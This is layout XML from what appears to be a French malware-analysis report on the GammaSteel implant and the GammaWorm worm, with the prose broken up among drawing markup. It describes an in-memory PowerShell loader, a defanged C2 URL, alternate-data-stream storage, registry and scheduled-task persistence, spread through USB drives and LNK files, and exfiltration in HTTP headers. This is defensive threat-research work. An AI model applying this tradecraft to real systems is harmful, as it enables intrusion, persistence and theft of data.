                            <a:pt x="5759449" y="545910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545910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489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6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14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s’appuie sur la gestion des exceptions pour réessayer la requête GET, garantissant ainsi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7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4583490" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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834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script ne se poursuit que lorsqu’un statut HTTP 200 OK valide est reçu.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8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5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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 cas de réponse réussie, le contenu est immédiatement décodé en Base64, puis déchiffré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0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3420069" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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00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via une opération XOR à l’aide d’une clé codée en dur.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1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1872838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5777318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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7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Le code ainsi obtenu est ensuite exécuté en mémoire via la commande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Invoke-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206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2088103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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Expression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. La charge utile finale a été récupérée en interrogeant le serveur C2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3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2281820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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hxxps://insight-sweet-drainage-appreciated.trycloudflare[.]com/log/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. Ce code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4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2464458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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est un script Powershell obfusqué identifié comme l’implant final, doté de capacités de vol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5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2637813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2108426" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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842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données et baptisé GammaSteel.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2894362</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3410683" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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0683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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.3GammaWorm : propagation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7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3298213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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GammaWorm s'exécute selon un processus en plusieurs étapes. L'analyse porte sur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8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3468635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3143630" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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36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spécifique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nommé</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="49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9232" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4399140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3471568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2337457" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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74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identifié</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="2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MD5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0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3648340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2532263" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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22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8e1624d110c090ff57d4b493a9107c66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1280" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2441575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9399290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2715802" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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580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10 – Chaîne d’exécution du ver GammaWorm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23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4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332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4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435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4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537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4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4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4074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8281044</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="854710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8547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854710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854710"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8547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1520" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3187065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2410469</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3568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2410469</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5616" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5586095</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6639569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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7664" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4486275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6639569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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868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4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971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4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0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2046119" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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611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Il effectue les actions suivantes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176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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565658" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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6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Installation, clonage et mutex : GammaWorm fonctionne comme une charge utile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278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1409088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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VBScript volumineuse et assemblée de manière dynamique (plus de 20 000 lignes). Il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380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1582443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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copie sa logique centrale dans un premier fichier ADS et met en place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killswitch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483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1755798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2053428" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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34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sein d’un fichier ADS secondaire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585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2030753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Persistance : sa survie après les redémarrages du système est assurée grâce à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2204108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">approche multicouche. Ga</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="23"/>
                          </w:rPr>
                          <w:t xml:space="preserve">mmaWorm crée des entrées de registre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7904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2396078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5367538" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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753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CurrentVersion\RunOnce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 qui exécuteront sa copie, modifie les paramètres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892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2592728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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registre de l’explorateur de fichiers pour dissimuler ses traces et exploite l’API COM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995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2766083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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native de Windows pour installer plusieurs tâches planifiées qui déclenchent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097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2939438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3178969" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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89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modules spécifiques stockés dans les fichiers ADS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200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3214393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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Propagation : il cible explicitement les partages réseau et les clés USB. Le module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302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3387748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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dépose de manière récursive des copies complètes de GammaWorm, masque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404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3561103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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répertoires légitimes et les remplace par des fichiers de raccourci LNK détournés.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507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3734458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Ces leurres s’appuient sur des techniques d’ingénierie sociale ukrainiennes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609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3907813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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utilisent un mécanisme à double exécution pour ouvrir le dossier attendu tout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4081168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3015961" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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596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exécutant GammaWorm de manière silencieuse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814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4356123</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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Porte dérobée : GammaWorm maintient une boucle d’exécution infinie, agissant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916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4529478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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comme une porte dérobée capable d’exécuter du code à distance de manière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019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4702833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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arbitraire. Il résout son infrastructure C2 via des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Dead Drop Resolvers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et exfiltre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121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4876188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4257873" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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78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empreintes de l’hôte entièrement au sein d’en-têtes HTTP aléatoires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2240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5146065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2610797" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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0797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4.3.1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Installation, clone et mutex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3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5458483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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Pour déployer divers modules, GammaWorm s'appuie sur la technique des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Alternate Data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4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5631838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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Stream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(ADS), propre à NTFS. Il s'agit là d'une évolution très notable par rapport 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5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5805193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1402242" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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22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versions précédentes.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6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6080148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5786053" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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60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De plus, il recourt à une concaténation massive de chaînes de caractères pour auto-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6253503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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assembler sa charge utile principale en VBScript directement en mémoire. Une fois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8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6423925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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désobfusquée, la charge utile </w:t>
                        </w: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dépasse les 20 000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lignes de code, q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ui sont chargées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9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6625178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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et exécutées de manière dynamique via la fonction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ExecuteGlobal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de VBScript. Il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0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6821828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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convient de noter que la grande majorité de ce script est constituée d’opérations inoffensives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1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6995183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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ou totalement non fonctionnelles, servant strictement de mécanisme anti-analyse destiné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2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7168538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1712236" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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223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entraver la rétro-ingénierie.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3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7443493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Une fois exécuté, GammaWorm localise son code sur le disque et en lit le contenu pour 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4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7613915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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répliquer. Il tente principalement de se cloner dans l’ADS </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%:GTR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. Si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5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7796553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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opération d’écriture échoue, GammaWorm se rabat sur un chemin standard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6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7966975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1764548" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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454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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%\boot.ini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8251848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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Ce mécanisme sert probablement de solution de secours si le système de fichiers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8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8425203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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compromis ne prend pas en charge la création d’ADS. Cependant, étant donné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9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8598558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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GammaWorm ne met pas en œuvre de chemins de secours standard pour chacune de ses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0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8771913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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opérations d’écriture d’ADS, cette action spécifique est probablement un vestige de code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1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8945268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1960763" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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07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hérité d’une version antérieure.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2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9217290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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Ensuite, GammaWorm crée un deuxième ADS à l’emplacement </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%:save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,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3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9399928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3706416" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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64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sert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killswitch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pour un module distinct, analysé plus tard.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47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5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57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5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68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5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5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88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4729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4861569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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523875">
                          <a:moveTo>
                            <a:pt x="0" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2121535" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2121535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  <a:moveTo>
                            <a:pt x="3614419" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3614419" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3614419" y="523875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="2122169" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3613784" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3613784" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2122169" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2122169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2121535" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2121535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5008" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3022599</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4861569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3637915" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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7915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7915" h="523875">
                          <a:moveTo>
                            <a:pt x="1492250" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3637915" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3637915" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1492250" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1492250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1491614" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1491614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2416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4861569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5767070" cy="2104390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2104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2104390">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="2104390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="2101215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="2101215"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1576705"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1576705"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1052195"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1052195"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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3440" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3022599</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4867919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="2091689"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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91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91689">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="209168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4464" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4514850</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4867919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="2091689"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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91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91689">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="209168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5488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4861569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="2104390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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104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104390">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="210439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9584" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6584314</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2545089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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982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2545089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2338070" cy="629920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8070" cy="629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38070" h="629920">
                          <a:moveTo>
                            <a:pt x="1402715" y="629920"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1402715" y="430529"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2337435" y="430529"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2337435" y="629920"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1402080" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2338070" y="431165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="414019"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1017905" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1017905" y="414019"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1018539" y="215265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872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4159259</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4159259</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4947919" cy="1534159"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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7919" cy="1534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47919" h="1534159">
                          <a:moveTo>
                            <a:pt x="34924" y="1534159"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="34924" y="1334769"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="561975" y="1334769"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="561975" y="1534159"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="34289" y="1335405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="562610" y="1335405"/>
                          </a:lnTo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4947284" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4947284" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4947919" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4415155" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="441515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232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5494029</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2404109" cy="525148"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4109" cy="5251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4109" h="525145">
                          <a:moveTo>
                            <a:pt x="0" y="525145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1264919" y="525145"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2122805" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2122805" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2403475" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2403475" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2122170" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="240410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256" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2199005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6018539</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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304" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>935354</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6018539</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4400" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3056890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6018539</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="281939" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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93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93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281305" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281305" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="28193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8496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6543049</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="937260" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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726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7260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936625" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="936625" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="93726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2592" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
